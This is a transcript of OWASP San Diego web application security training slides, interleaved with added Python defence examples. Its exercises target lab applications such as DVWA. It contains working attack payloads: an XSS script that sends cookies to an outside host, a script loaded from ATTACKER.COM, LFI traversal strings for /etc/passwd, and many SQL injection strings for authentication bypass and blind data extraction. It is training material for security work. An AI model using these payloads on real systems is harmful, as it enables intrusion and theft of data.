owasp san diego training presentation


Upload: owaspsd

Post on 13-May-2015


DESCRIPTION

OWASP San Diego Training Slides from May, 2014

TRANSCRIPT

Page 1: OWASP San Diego Training Presentation

<script>alert('OWASP Training');</script>

Page 2: OWASP San Diego Training Presentation

Warning: This Presentation Is Intended For Educational Purposes Only

Page 3: OWASP San Diego Training Presentation

Setup
Web Communication
SQL Basics
HTTP/HTTPS Overview
Tools
Other related technologies
XSS
CSRF
URL Redirect
Local File Inclusion (LFI)
Remote File Inclusion (RFI)
Direct Object Access
SQL Injection
Command Injection
Javascript Server Side Injection

Topics

Page 4: OWASP San Diego Training Presentation

Kali Linux Firefox plugins

◦ Web Developer
◦ User-Agent Switcher
◦ Firebug
◦ SOA Client

Setup Check

Page 5: OWASP San Diego Training Presentation

Setup https://172.17.0.42/dvwa/

Username: admin Password: *****

Exercise - DVWA Portal

Page 6: OWASP San Diego Training Presentation

Basic Web Communication

Page 7: OWASP San Diego Training Presentation

Client → Server

Client sends a request; the server sends back a response.
E.g. Web Browser → Web Server (port 80)
◦ Web Server → Postgres database to fetch data
⚫ Data is returned to the Web Server, which processes it and renders it for the Web Browser

Basic Web Communication

Page 8: OWASP San Diego Training Presentation

Web Request

Basic Web Communication

GET / HTTP/1.1
Host: api.bonfire-project.eu:444
Accept: */*
Authorization: Basic XXX
Accept-Encoding: gzip, deflate

Page 9: OWASP San Diego Training Presentation

Web Response

Basic Web Communication

HTTP/1.1 200 OK
Vary: Authorization,Accept
Transfer-Encoding: chunked
Etag: "fa2ba873343ba638123b7671c8c09998"
Content-Type: application/vnd.bonfire+xml; charset=utf-8
Date: Wed, 01 Jun 2011 14:59:30 GMT
Server: thin 1.2.11 codename Bat-Shit Crazy
Allow: GET,OPTIONS,HEAD
Cache-Control: public,max-age=120
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<root xmlns="http://api.bonfire-project.eu/doc/schemas/occi" href="/">
  <version>0.8.9</version>
  <timestamp>1306940370</timestamp>
  <link rel="experiments" href="/experiments" type="application/vnd.bonfire+xml"/>
  <link rel="locations" href="/locations" type="application/vnd.bonfire+xml"/>
  <link rel="users" href="/users" type="application/vnd.bonfire+xml"/>
</root>

Page 10: OWASP San Diego Training Presentation

Example using Burpsuite (Repeater)…

DEMO - Request/Response

Page 11: OWASP San Diego Training Presentation

GET POST HEAD TRACE PUT DELETE CONNECT OPTIONS

HTTP Methods

Page 12: OWASP San Diego Training Presentation

100 (Informational) 200 (Success) 300 (Redirect) 400 (Client Error) 500 (Server Error)

HTTP Response Codes

Page 13: OWASP San Diego Training Presentation

http://www.victim.com/page.aspx?parameter1=test&parameter2=test#location=3

HTTP URI/URL

Page 14: OWASP San Diego Training Presentation

Database communication

Web Server communicates to DB to fetch data

SQL or a SQL abstraction layer is used
SQL = Structured Query Language

Basic Web Communication

Page 15: OWASP San Diego Training Presentation

Example Relational SQL DB

Page 16: OWASP San Diego Training Presentation

SELECT INSERT UPDATE DELETE

Types Of SQL Statements

Page 17: OWASP San Diego Training Presentation

SELECT column_name FROM table_name WHERE column_name='value' ORDER BY column_name DESC

SELECT 'random string'
SELECT 'random string' FROM DUAL (Oracle requires a FROM clause; DUAL is its one-row dummy table)

SeLeCt Price where ISBN_NO = '0201703092'; (SQL keywords are case-insensitive; the slide omits the FROM clause)

SELECT Statement

Page 18: OWASP San Diego Training Presentation

Weak Passwords
Open Directories
Client Side Security
Detailed Error Messages

Insecure Configuration

Page 19: OWASP San Diego Training Presentation

https://172.17.0.145/Web2/
Client-Side Security - Exercise

https://172.17.0.145/CrackGomezsPassword/

Demo…

EXERCISE – Insecure config.

Page 20: OWASP San Diego Training Presentation

HTTPS Communication

Page 21: OWASP San Diego Training Presentation

SSL/TLS versions: SSLv2, SSLv3, TLS 1.0, TLS 1.1, TLS 1.2

Key exchange mechanisms: RSA, DH, DHE/EDH, ECDHE, …

Authentication mechanisms: RSA, …

Encryption algorithms: RC4, DES, AES, IDEA, SEED, …

Encryption modes: CBC, ECB, GCM, Counter (CTR), …

HTTPS Overview

Page 22: OWASP San Diego Training Presentation

HTTPS = HTTP over SSL/TLS (SSLv3, TLS 1.0, TLS 1.1 or TLS 1.2)

Handshake (messages marked * are optional):

CLIENT                                  SERVER
ClientHello            ----->
                                        ServerHello
                                        Certificate *
                                        ServerKeyExchange *
                                        CertificateRequest *
                       <-----
Certificate *
ClientKeyExchange
CertificateVerify *
Finished               ----->
                       <-----           Finished
Application Data       <---->           Application Data

HTTPS Overview

Page 23: OWASP San Diego Training Presentation

HTTPS Overview

Page 24: OWASP San Diego Training Presentation

HTTPS Overview

Page 25: OWASP San Diego Training Presentation

Burpsuite

Page 26: OWASP San Diego Training Presentation

Demo/Exercise

Burpsuite

Page 27: OWASP San Diego Training Presentation

Web Developer Toolbar

Page 28: OWASP San Diego Training Presentation

Firebug

Page 29: OWASP San Diego Training Presentation

IE Developer Toolbar (F12)

Page 30: OWASP San Diego Training Presentation

User Agent Switcher

Page 31: OWASP San Diego Training Presentation

Download user agent xml list◦ http://techpatterns.com/forums/about304.html

User Agent Switcher

Page 32: OWASP San Diego Training Presentation

SOA Client

Page 33: OWASP San Diego Training Presentation

XMLHttpRequest (XHR)
◦ Usually identifiable by the X-Requested-With: XMLHttpRequest request header

JavaScript Object Notation (JSON)
◦ Way of representing data
◦ { "Firstname": "Jake", "lastname": "Jones" }

SOAP
◦ Look for .asmx files or asmx?WSDL
◦ Could be server-to-server or client-to-server

REST
◦ Parameters are specified in the URL
◦ If you don't have documentation you can try to guess the REST parameters

Other HTTP Related Technologies

Page 34: OWASP San Diego Training Presentation

Reflected XSS
Stored XSS
DOM-based XSS

Cross-Site Scripting (XSS)

Page 35: OWASP San Diego Training Presentation

http://192.168.1.124/WackoPicko/pictures/search.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&x=0&y=0

Reflected XSS can be in POST

Reflected XSS

Page 36: OWASP San Diego Training Presentation

Reflected XSS payloads can also arrive in the User-Agent header or in a cookie. Flash used to allow an attacker to control many HTTP request headers, which made header-based reflection exploitable cross-site.

Reflected XSS

Page 37: OWASP San Diego Training Presentation

HTML and/or JavaScript is stored on the server and later served to other users who view the affected page

Stored XSS

Page 38: OWASP San Diego Training Presentation

User input is read by JavaScript on the client and written back into the page (the payload may never reach the server, so server-side filters do not see it)

Try exploits with IE (or mobile Safari…)

DOM-based XSS

Page 39: OWASP San Diego Training Presentation

Put a canary value in the parameter: http://victim.com/id=yoyoyo
Use the Web Developer toolbar to view the generated source
Check where the canary appears in the source
Check whether HTML encoding is being used, or which characters are available
◦ http://victim.com/id=yoyoyo<
Sploit if possible

Finding XSS
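The canary procedure above, as an added example that is not part of the original slides. The two page_* functions are constructed stand-ins for the vulnerable server (one echoes the parameter raw, one HTML-encodes it); probe_reflection sends the canary, then the canary followed by each metacharacter, and reports where the canary lands and which characters come back unencoded, which is what tells you whether you can break out into a new tag.

```python
import html

# Constructed stand-ins for the server under test (not from the slides): each takes
# the value of the `id` parameter and returns the page the server would send back.
def page_unencoded(value: str) -> str:
    return f"<html><body><p>Results for {value}</p></body></html>"

def page_html_encoded(value: str) -> str:
    return f"<html><body><p>Results for {html.escape(value)}</p></body></html>"

CANARY = "yoyoyo"
PROBE_CHARS = ["<", ">", '"', "'", "/", "(", ")"]

def probe_reflection(render, canary: str = CANARY, chars=PROBE_CHARS) -> dict:
    """Send the canary, then canary+char for each metacharacter; report where the
    canary lands in the page and which characters survive verbatim (usable in a
    payload). `render` stands in for 'fetch the page with this parameter value'."""
    body = render(canary)
    pos = body.find(canary)
    if pos < 0:
        return {"reflected": False, "context": "", "usable": []}
    context = body[max(0, pos - 20): pos + len(canary) + 20]
    usable = [ch for ch in chars if canary + ch in render(canary + ch)]
    return {"reflected": True, "context": context, "usable": usable}

def can_inject_tag(render) -> bool:
    """True when '<' and '>' both survive, so a new tag such as <script> can be opened."""
    usable = probe_reflection(render)["usable"]
    return "<" in usable and ">" in usable
```

Against a real target, render is a function that fetches the page with the canary in the parameter; the per-character loop is exactly the "yoyoyo<" check on the slide, repeated for every character your payload will need.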

Page 40: OWASP San Diego Training Presentation

<script>var+i=new+Image;+i.src="http://192.168.1.120"%2bdocument.cookie;</script>

<SCRIPT SRC=HTTP://ATTACKER.COM/AAA.JS></SCRIPT>

Exploiting XSS Vulns

Page 41: OWASP San Diego Training Presentation

Host XSS JavaScript files or resources on an Apache server

Or start a Python server
◦ python -m SimpleHTTPServer

SimpleHTTPServer can easily be wrapped with Python's ssl library to serve over HTTPS

Exploiting XSS Vulns

Page 42: OWASP San Diego Training Presentation

Browser Exploitation Framework (BeEF)

Exploiting XSS Vulns

Page 43: OWASP San Diego Training Presentation

HTML-encode all output
Be careful where user output is placed in the HTML
◦ HTML encoding won't save you here: <html><script src=http://[user_controlled_input]></script></html>
Do NOT write user input into the JavaScript section of the page

XSS Defense
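The three cases on the slide (text context, src attribute, JavaScript section) side by side, as an added example that is not part of the original deck. The host allowlist is an assumption for the example. The point is that html.escape is the right tool for a text node, is useless for a URL landing in a src attribute (the attacker's URL contains nothing to encode), and that data for JavaScript should be passed as a JSON literal rather than spliced into code.

```python
import html
import json
from urllib.parse import urlsplit

ALLOWED_SCRIPT_HOSTS = {"static.example.com"}   # assumed allowlist, not from the slides

def render_search_result(query: str) -> str:
    # Text-node context: HTML encoding is the right defence here.
    return f"<p>Results for {html.escape(query)}</p>"

def render_script_src_encoded_only(url: str) -> str:
    # Slide 43's counter-example: the input is a URL inside a src attribute, so
    # html.escape leaves an attacker-controlled script source perfectly intact.
    return f'<script src="{html.escape(url)}"></script>'

def script_src_allowed(url: str) -> bool:
    parts = urlsplit(url)
    return parts.scheme == "https" and parts.netloc.lower() in ALLOWED_SCRIPT_HOSTS

def render_script_src_allowlisted(url: str) -> str:
    # URL context: validate scheme and host against an allowlist first, then encode.
    if not script_src_allowed(url):
        raise ValueError(f"script source not allowed: {url!r}")
    return f'<script src="{html.escape(url)}"></script>'

def render_js_data(value: str) -> str:
    # If data must reach JavaScript, hand it over as a JSON string literal with '</'
    # escaped so the value cannot close the <script> block; never splice input into code.
    literal = json.dumps(value).replace("</", "<\\/")
    return f"<script>var userValue = {literal};</script>"
```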

Page 44: OWASP San Diego Training Presentation

https://172.17.0.42/dvwa/ XSS Reflect exercise

EXERCISE - XSS

Page 45: OWASP San Diego Training Presentation

Request on behalf of the attacker:
https://victim.com/change_password.asp?username=admin&password=mypassword123

If tokens are not random they can be guessed or brute-forced

CSRF can be in GET or POST

Cross Site Request Forgery (CSRF)

Page 46: OWASP San Diego Training Presentation

CSRF Tokens
◦ Generate random tokens
◦ Make sure you check your tokens ☺

CSRF Defense
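Both bullets on the slide in code, as an added example that is not from the original deck. The session store and the change_password handlers are constructed for the example. The token comes from secrets (256 bits, so it cannot be guessed or brute-forced), is bound to the session, and is compared with hmac.compare_digest; a missing or wrong token is rejected rather than silently ignored.

```python
import hmac
import secrets

# Constructed in-memory session store (session id -> session data); not from the slides.
SESSIONS = {}

def start_session(user: str = "admin") -> str:
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}  # 256-bit random token
    return sid

def csrf_token_for(sid: str) -> str:
    """The token the server embeds in its own forms (hidden field) for this session."""
    return SESSIONS[sid]["csrf"]

def change_password_vulnerable(sid: str, params: dict) -> bool:
    # Slide 45: any request the victim's browser can be tricked into sending succeeds.
    SESSIONS[sid]["password"] = params["password"]
    return True

def change_password(sid: str, params: dict) -> bool:
    expected = SESSIONS.get(sid, {}).get("csrf")
    submitted = params.get("csrf_token")
    if not expected or not submitted:
        return False            # no token is a failure, never a fallback to "no check"
    if not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False            # constant-time compare; wrong token is rejected
    SESSIONS[sid]["password"] = params["password"]
    return True
```

The attacker's page can make the victim's browser send the request with the session cookie, but it cannot read the token out of the victim's session to include it, so the forged request fails the check.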

Page 47: OWASP San Diego Training Presentation

https://victim.com/login.asp?landing_page=/user.asp

https://victim.com/login.asp?landing_page=http://www.google.com

URL Redirect

Page 48: OWASP San Diego Training Presentation

If http:// is blocked, try https://. If both http:// and https:// are blocked, try a scheme-relative URL such as //google.com

URL Redirect

Page 49: OWASP San Diego Training Presentation

Redirecting to other pages within the site can still be considered a vulnerability

For example, when combining the attack with other attacks like XSS, CSRF, out of band SQL injection, or command injection

https://victim.com/login.aspx?page=user.aspx?param=<script>alert(1)</script>

URL Redirect

Page 50: OWASP San Diego Training Presentation

A URL redirect can be used to steal session information carried in the URL, because the attacker's server sees it in the Referer header

https://victim.com/login?page=http://attacker.com

https://victim.com/login?page=http://attacker.com&jsessionId=AB21CF40A3BD698

URL Redirect

Page 51: OWASP San Diego Training Presentation

Store the location of redirect(s) on the server
Create a whitelist of possible URLs to redirect to

URL Redirect
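The two defences on the slide, as an added example that is not from the original deck; the allowlist and the id table are assumptions for the example. safe_landing only ever returns a local path from the allowlist, and explicitly handles the bypasses from the earlier slides: http://, https://, the scheme-relative //google.com, the browser-equivalent /\google.com, and a query string smuggled after the path.

```python
from urllib.parse import urlsplit

DEFAULT_LANDING = "/user.asp"
# Allowlist of local pages the login form may send users to (assumed, not from the slides).
ALLOWED_LANDING = {"/user.asp", "/account.asp"}
# Server-side table approach: the client names an id, never a URL.
LANDING_BY_ID = {"1": "/user.asp", "2": "/account.asp"}

def landing_from_id(value: str) -> str:
    return LANDING_BY_ID.get(value, DEFAULT_LANDING)

def safe_landing(value: str) -> str:
    """Return a local path from the allowlist, or the default for anything else."""
    if not value or any(ord(c) < 0x20 for c in value):
        return DEFAULT_LANDING                 # control characters: header injection risk
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        return DEFAULT_LANDING                 # http://, https://, javascript:, //host
    if value[0] != "/" or value[1:2] in ("/", "\\"):
        return DEFAULT_LANDING                 # //host and /\host are treated as hosts by browsers
    if parts.path not in ALLOWED_LANDING:
        return DEFAULT_LANDING
    return parts.path                          # query and fragment are dropped on purpose
```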

Page 52: OWASP San Diego Training Presentation

PHP functions
◦ include()
◦ include_once()
◦ require()
◦ require_once()
◦ fopen()

Local File Inclusion

Page 53: OWASP San Diego Training Presentation

../../../../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\..\boot.ini
.././.././.././.././.././../etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

Local File Inclusion

Page 54: OWASP San Diego Training Presentation

Typically, LFI vulnerabilities in Java and .NET applications do not allow access outside the web root folder

Instead of trying ../../../../../../../../../../../etc/passwd first, try ../index.jsp or ../../scripta.js

Local File Inclusion

Page 55: OWASP San Diego Training Presentation

Harden php.ini and other configuration files
Make sure web directories are not writable
Don't trust user input for file operations

LFI Defense
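"Don't trust user input for file operations" in code, as an added example that is not from the original deck; the pages directory and the allowlist are assumptions. resolve_page decodes (twice, to catch %252e), normalises backslashes, resolves the path and checks that it is still inside the directory and names an allowed file. The payloads from the LFI slides are all rejected.

```python
import posixpath
from urllib.parse import unquote

PAGES_DIR = "/var/www/site/pages"           # assumed directory of includable pages
ALLOWED_PAGES = {"home.php", "about.php"}   # assumed allowlist of page names

def resolve_page(param: str) -> str:
    """Map a user-supplied page name to a file path, or raise ValueError."""
    decoded = unquote(unquote(param))       # %2e%2e%2f and double-encoded %252e both become ../
    if "\x00" in decoded:
        raise ValueError("null byte in path")
    decoded = decoded.replace("\\", "/")    # treat ..\..\ the same as ../../
    candidate = posixpath.normpath(posixpath.join(PAGES_DIR, decoded))
    # join() discards PAGES_DIR for absolute input and normpath() resolves ../, so the
    # containment check has to be done on the final path, not on the raw string.
    if posixpath.commonpath([PAGES_DIR, candidate]) != PAGES_DIR:
        raise ValueError(f"path escapes {PAGES_DIR}: {candidate}")
    if posixpath.dirname(candidate) != PAGES_DIR or posixpath.basename(candidate) not in ALLOWED_PAGES:
        raise ValueError(f"page not in allowlist: {candidate}")
    return candidate

def blocked(param: str) -> bool:
    """True when resolve_page rejects the input (convenience for checking payloads)."""
    try:
        resolve_page(param)
    except ValueError:
        return True
    return False
```

The allowlist is the real defence; the containment check is there so that a mistake in the allowlist (or a later "just this one extra directory" change) still cannot reach /etc/passwd.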

Page 56: OWASP San Diego Training Presentation

https://172.17.0.42/dvwa/ File Inclusion exercise

EXERCISE - LFI

Page 57: OWASP San Diego Training Presentation

allow_url_fopen = On
◦ Whether to allow the treatment of URLs (like http:// or ftp://) as files
◦ http://victim.com/allow-url-fopen

allow_url_include = On
◦ Whether to allow include/require to open URLs (like http:// or ftp://) as files
◦ http://victim.com/allow-url-include

Remote File Inclusion

Page 58: OWASP San Diego Training Presentation

Go straight to the file
Directory listing helps a lot
Can use Burp Intruder
Check robots.txt
DirBuster
Burp engagement tools

Direct Object Access

Page 59: OWASP San Diego Training Presentation

SQL is a standard query language; each vendor implements its own dialect of it

MySQL MSSQL Oracle Postgres DB2

SQL Injection

Page 60: OWASP San Diego Training Presentation

Error
Union
Blind
Bypass (e.g. authentication bypass)

Types Of SQL Injection

Page 61: OWASP San Diego Training Presentation

'
"
')
)))))))))
;
\'
\"
--
' or 1=1 --
' and 1=2 --
%27
%2527
%22
#
/**/
' waitfor delay '0:0:20'--
'+waitfor+delay+'0:0:20'+--
' (select sleep(20)) -- -
' (select pg_sleep(20))--
'/**/(select/**/sleep(20))/**/--%20
or 1=(select benchmark(1000000,MD5('A')))--
convert(varchar,0x7b5d)
chr(0xbf).chr(0x27)

Triggering SQL Injection

Page 62: OWASP San Diego Training Presentation

Places to try when trying to trigger a SQL injection:
◦ GET parameters
◦ POST parameters
◦ HEAD parameters (blind injection only)
◦ Cookie
◦ Referer header
◦ User-Agent header
◦ SOAP parameters
◦ JSON parameters

Try using Burp to defeat client-side (JavaScript) SQL injection protections

Triggering SQL Injection

Page 63: OWASP San Diego Training Presentation

admin' or 1=1 --
admin' or '1'='1
admin'/**/or/**/2/**/LiKe/**/2--/**/

Original query:
SELECT username, password FROM users WHERE username = 'admin' AND password = 'admin';

After injection (everything after -- is a comment, so the password check disappears):
SELECT username, password FROM users WHERE username = 'admin' or 1=1 -- ' AND password = 'admin'

SQL Injection Authentication Bypass

Page 64: OWASP San Diego Training Presentation

https://172.17.0.42/owaspbricks/login-1/ exercise

EXERCISE – SQL Injection Auth. Bypass

Page 65: OWASP San Diego Training Presentation

https://172.17.0.42/owaspbricks/login-2/ exercise

EXERCISE – SQL Injection Auth. Bypass

Page 66: OWASP San Diego Training Presentation

https://172.17.0.145/Web1/ exercise

EXERCISE – SQL Injection Auth. Bypass

Page 67: OWASP San Diego Training Presentation

Errors must be enabled in the database or application configuration, or exceptions in the code must be handled badly enough that they are printed back to the user

The goal is to make the database throw an error and have the error message, with valuable data in it, printed back to you

ERROR Based SQL Injection

Page 68: OWASP San Diego Training Presentation

http://victim.com/showmovies.aspx?name=rad' and 1=0/@@version --

Server Error in '/' Application.
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: )' to a column of datatype int.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

ERROR Based SQL Injection

Page 69: OWASP San Diego Training Presentation

(MSSQL) Get a column name:
http://victim.com/showmovies.aspx?name=rad' having '1'='1
→ the error reveals WEBUSERS.UserID

Get the next column name:
http://victim.com/showmovies.aspx?name=rad' group by UserID having '1'='1
→ the error reveals WEBUSERS.Username

ERROR Based SQL Injection

Page 70: OWASP San Diego Training Presentation

Error Based SQLi MySQL

http://victim.com/showmovies.php?name=rad' and ExtractValue(1,CONCAT(0x5c, (SELECT @@version))) --%20

XPATH syntax error: '\5.1.41-3ubuntu12.6-log'

ERROR Based SQL Injection

Page 71: OWASP San Diego Training Presentation

For Oracle error-based SQL injection use the utl_inaddr.get_host_name() function

http://victim.com/showmovies.jsp?name=rad' and (utl_inaddr.get_host_name((select+sys.database_name+from+dual)))=1 --

ORA-29257: host MOVIE_DATABASE unknown
ORA-06512: at 'SYS.UTL_INADDR' line 4
ORA-06512: at 'SYS.UTL_INADDR' line 35
ORA-06512: at line 1

ERROR Based SQL Injection

Page 72: OWASP San Diego Training Presentation

Sometimes the utl_inaddr.get_host_name() function produces the following error:
◦ ORA-24247: network access denied by access control list (ACL)

The following technique works regardless of network restrictions/permissions:

(select%201%20from%20dual%20where%201=1%20and%201=length(extractvalue(xmltype('<x/>'),'/$'||(select%20user%20from%20dual))))

ERROR Based SQL Injection

Page 73: OWASP San Diego Training Presentation

Postgres

http://victim.com/showmovies.do?name=rad' and 1=cast(version() as int)--

ERROR: invalid input syntax for integer "PostgreSQL 8.3.7 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20071124 (Red Hat 4.1.2-42)"

ERROR Based SQL Injection

Page 74: OWASP San Diego Training Presentation

https://172.17.0.42/dvwa/ → SQL Injection

Demo/Exercise – Errorbased SQL Injection

Page 75: OWASP San Diego Training Presentation

Find the number of columns
◦ ' order by 2 --

Find columns that return data
◦ ' union select 1,2 --

Extract data using a column
◦ ' union select 1,@@version --

Union Based SQL Injection

Page 76: OWASP San Diego Training Presentation

https://172.17.0.42/dvwa/ → SQL Injection

Demo/Exercise – Unionbased SQL Injection

Page 77: OWASP San Diego Training Presentation

When entering a SQLi trigger you get a generic error or redirect (HTTP 200, 302, 500)

To confirm the SQL injection try a time-based delay
◦ waitfor delay '0:0:20' -- (MS SQL)
◦ benchmark(100000000, rand()) -- (MySQL)
◦ select sleep(20) -- (MySQL 5.0.12 and later)
◦ pg_sleep(20) -- (Postgres)
◦ 'a'||Utl_Http.request('http://madeupserver.com') -- (Oracle)
◦ dbms_lock.sleep(20) -- (Oracle; DBA only, requires PL/SQL injection and doesn't work in a WHERE clause)

Blind SQL Injection

Page 78: OWASP San Diego Training Presentation

Examples of confirming SQL injection
http://victim.com/showmovies.aspx?name=rad' waitfor delay '0:0:20' --
http://victim.com/showmovies.php?name=rad' or 1= (select sleep(20)) --%20
http://victim.com/showmovies.do?name=rad' pg_sleep(20) --
http://victim.com/showmovies.jsp?name=rad' 'a'||Utl_Http.request('http://madeupserver.com') --

Blind SQL Injection

Page 79: OWASP San Diego Training Presentation

Other methods for confirming blind SQL injection

Try addition or subtraction
◦ http://victim.com/showmovies.aspx?id=2
◦ http://victim.com/showmovies.aspx?id=3-1
◦ http://victim.com/showmovies.aspx?id=1%2b1

Try a comment
◦ http://victim.com/showmovies.aspx?name=rad' --
◦ http://victim.com/showmovies.aspx?id=1 /**/

Try a percent sign or a statement that evaluates to true and/or false
◦ http://victim.com/showmovies.aspx?name=%
◦ http://victim.com/showmovies.aspx?name=rad' or 1=1 --
◦ http://victim.com/showmovies.aspx?name=rad' and 1=2 --

Try string concatenation
◦ (MSSQL) http://victim.com/showmovies.aspx?name=ra'%2b'd
◦ (Oracle) http://victim.com/showmovies.jsp?name=ra'||'d
◦ (MySQL) http://victim.com/showmovies.php?name=ra' 'd

Blind SQL Injection

Page 80: OWASP San Diego Training Presentation

Extracting Data (TRUE or FALSE)http://victim.com/showmovies.aspx?name=rad' ;if is_srvrolemember('sysadmin')=1 waitfor delay '0:0:20'--

http://victim.com/showmovies.aspx?name=rad';if @@version like '%252005%25' waitfor delay '0:0:20' --

Blind SQL Injection

Page 81: OWASP San Diego Training Presentation

LIKE techniquehttp://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25a%25' waitfor delay '0:0:12'--(TRUE) (contains 'a')

http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25e%25' waitfor delay '0:0:12'--(TRUE) (contains 'e')

http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25o%25' waitfor delay '0:0:12'--(TRUE) (contains 'o')

http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25p%25' waitfor delay '0:0:12'--(TRUE) (contains 'p')

Blind SQL Injection

Page 82: OWASP San Diego Training Presentation

LIKE technique Continued

http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25r%25' waitfor delay '0:0:12'--(TRUE) (contains 'r')

http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25s%25' waitfor delay '0:0:12'--(TRUE) (contains 's')

http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25u%25' waitfor delay '0:0:12'--(TRUE) ( contains 'u' )

http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25w%25' waitfor delay '0:0:12'--(TRUE) ( contains 'w' )

http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25_%25' waitfor delay '0:0:12'--(TRUE) ( contains '_' )

(aeoprsuw_)

Blind SQL Injection

Page 83: OWASP San Diego Training Presentation

LIKE Technique Continuedhttp://victim.com/search.aspx?id=1';if SYSTEM_USER like 'o%25' waitfor delay '0:0:12'--(TRUE) ( starts with 'o')

http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'ow%25' waitfor delay '0:0:12'--(TRUE) ( starts with 'ow')

http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owa%25' waitfor delay '0:0:12'--(TRUE) ( starts with 'owa')

http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owas%25' waitfor delay '0:0:12'--(TRUE) ( starts with 'owas')

Blind SQL Injection

Page 84: OWASP San Diego Training Presentation

LIKE Technique Continued

http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp%25' waitfor delay '0:0:12'--(TRUE) ( starts with 'owasp')

http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_%25' waitfor delay '0:0:12'--(TRUE) (starts with 'owasp_')

http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_u%25' waitfor delay '0:0:12'--(TRUE) (starts with 'owasp_u')

http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_us%25' waitfor delay '0:0:12'--(TRUE) (starts with 'owasp_us')

http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_use%25' waitfor delay '0:0:12'--(TRUE) (starts with 'owasp_use')

http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_user' waitfor delay '0:0:12'--(TRUE) (user is 'owasp_user')

Blind SQL Injection

Page 85: OWASP San Diego Training Presentation

Binary Search Techniquehttp://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <127 waitfor delay'0:0:20'--TRUE

http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <63 waitfor delay'0:0:20'--FALSE

http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <95 waitfor delay'0:0:20'--FALSE

http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <110 waitfor delay'0:0:20'--FALSE

Blind SQL Injection

Page 86: OWASP San Diego Training Presentation

Binary Search Technique Continued

http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <119 waitfor delay'0:0:20'--TRUE

http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <114 waitfor delay'0:0:20'--TRUE

http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <112 waitfor delay'0:0:20'--FALSE

http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) =111 waitfor delay'0:0:20'--TRUE111 (ASCII (DECIMAL))First char is o

Blind SQL Injection

Page 87: OWASP San Diego Training Presentation

Logical AND (&) Technique (break out the ascii chart)

How logical AND operator works◦ 1 & 1 = 1◦ 1 & 0 = 0◦ 0 & 1 = 0 ◦ 0 & 0 = 0◦ 1100 & 0110 = 0100

This technique will extract one bit at a time (8 requests per byte)

Blind SQL Injection

Page 88: OWASP San Diego Training Presentation

Ascii Character 'o' is HEX 6F and binary 0110 1111

ASCII characters occupy 7 bits (values 0-127), so one byte covers every character; we AND each character with 128 (1000 0000), 64 (0100 0000), 32 (0010 0000), 16 (0001 0000), 8 (0000 1000), 4 (0000 0100), 2 (0000 0010) and 1 (0000 0001)

If we AND the character with each bit in turn and delay a certain number of seconds whenever the result is non-zero, then for 'o' (0110 1111) we should get

NO-DELAY, DELAY, DELAY, NO-DELAY
DELAY, DELAY, DELAY, DELAY

Blind SQL Injection

Page 89: OWASP San Diego Training Presentation

http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 128=128 waitfor delay'0:0:20'--FALSE (NO-Delay)

http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 64=64 waitfor delay'0:0:20'--TRUE (Delay)

http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 32=32 waitfor delay'0:0:20'--TRUE (Delay)

http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 16=16 waitfor delay'0:0:20'--FALSE (NO-Delay)

Blind SQL Injection

Page 90: OWASP San Diego Training Presentation

http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 8=8 waitfor delay'0:0:20'--TRUE (Delay)

http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 4=4 waitfor delay'0:0:20'--TRUE (Delay)

http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 2=2 waitfor delay'0:0:20'--TRUE (Delay)

http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 1=1 waitfor delay'0:0:20'--TRUE (Delay)

Blind SQL Injection

